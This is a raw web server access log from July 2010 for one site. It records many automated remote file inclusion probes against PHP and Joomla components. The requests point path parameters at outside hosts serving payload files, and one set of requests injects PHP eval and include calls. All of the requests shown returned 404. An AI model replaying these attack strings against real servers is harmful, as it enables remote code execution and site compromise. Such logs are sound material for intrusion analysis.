94.143.220.3 - - [02/Jul/2010:04:08:10 -0700] "GET /logs/access_100601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
94.143.220.3 - - [02/Jul/2010:04:08:11 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
94.143.220.3 - - [02/Jul/2010:04:08:11 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
195.190.166.35 - - [02/Jul/2010:04:09:29 -0700] "GET /logs/access_100601.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
195.190.166.35 - - [02/Jul/2010:04:12:06 -0700] "GET /logs/scripts.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:13 -0700] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:13 -0700] "GET /logs/access_100601.log/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:13 -0700] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:14 -0700] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:14 -0700] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:14 -0700] "GET /logs/access_100601.log/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:33 -0700] "GET /logs/access_100601.log/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:33 -0700] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:16:33 -0700] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:17:04 -0700] "GET /logs/access_100601.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:17:08 -0700] "GET /logs/access_100601.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:17:26 -0700] "GET /logs/access_100601.log%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
65.13.185.104 - - [02/Jul/2010:04:19:19 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
93.186.192.124 - - [02/Jul/2010:04:21:45 -0700] "GET /logs/access.log/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
149.31.6.24 - - [02/Jul/2010:04:45:52 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
149.31.6.24 - - [02/Jul/2010:04:45:52 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
149.31.6.24 - - [02/Jul/2010:04:45:52 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
149.31.6.24 - - [02/Jul/2010:04:46:00 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
149.31.6.24 - - [02/Jul/2010:04:46:00 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
149.31.6.24 - - [02/Jul/2010:04:46:00 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [02/Jul/2010:04:48:16 -0700] "GET /logs/access_100601.log%20%20//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [02/Jul/2010:04:48:16 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [02/Jul/2010:04:48:16 -0700] "GET /Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [02/Jul/2010:04:48:20 -0700] "GET /Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [02/Jul/2010:04:48:20 -0700] "GET /logs/access_100601.log%20%20//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [02/Jul/2010:04:48:23 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:15 -0700] "GET /logs/access_100501.log//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:15 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:15 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:15 -0700] "GET /logs/access_100501.log//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:48 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:48 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [02/Jul/2010:04:51:48 -0700] "GET /logs/access_100501.log//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr/xe/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [02/Jul/2010:04:52:55 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [02/Jul/2010:04:54:15 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.167.158.167 - - [02/Jul/2010:05:10:06 -0700] "GET /logs/access_100501.log HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.de-construction.com"
174.138.171.86 - - [02/Jul/2010:05:10:17 -0700] "GET /logs/access_100501.log HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:13:28 -0700] "GET /components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:13:28 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:13:28 -0700] "GET /logs/access_100531.log//components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:15:03 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:15:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:15:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:17:06 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:17:06 -0700] "GET /logs/access_100531.log//components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:17:06 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:17:06 -0700] "GET /components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:17:07 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:17:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
65.13.185.104 - - [02/Jul/2010:05:17:30 -0700] "GET /logs/access_100601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
65.13.185.104 - - [02/Jul/2010:05:17:30 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
65.13.185.104 - - [02/Jul/2010:05:17:32 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:21:50 -0700] "GET /components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:21:50 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
113.30.66.24 - - [02/Jul/2010:05:21:50 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.250.200.78 - - [02/Jul/2010:05:26:17 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.250.200.78 - - [02/Jul/2010:05:26:17 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.250.200.78 - - [02/Jul/2010:05:26:20 -0700] "GET /logs/access_100601.log//components/com_virtuemart/errors.php?error=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.250.200.78 - - [02/Jul/2010:05:26:36 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.250.200.78 - - [02/Jul/2010:05:26:36 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.250.200.78 - - [02/Jul/2010:05:26:38 -0700] "GET /logs/access_100601.log//components/com_virtuemart/errors.php?error=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:05:29:28 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:05:29:28 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:05:29:28 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:05:29:28 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:05:29:28 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:05:29:28 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:05:31:28 -0700] "GET /logs/access_100501.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:05:31:43 -0700] "GET /logs/access_100501.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:35 -0700] "GET /logs/access_100601.log%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:35 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:35 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:37 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:37 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:37 -0700] "GET /logs/access_100601.log%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:42 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:42 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:42 -0700] "GET /logs/access_100601.log%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:42 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:42 -0700] "GET /logs/access_100601.log%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:32:42 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:32:57 -0700] "GET /com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:32:57 -0700] "GET /logs//com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:32:57 -0700] "GET /logs/access_100601.log%20%20//com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:33:01 -0700] "GET /com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:33:01 -0700] "GET /logs//com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [02/Jul/2010:05:33:01 -0700] "GET /logs/access_100601.log%20%20//com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:34:57 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:34:57 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.6.104.146 - - [02/Jul/2010:05:34:57 -0700] "GET /logs/access_100601.log%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
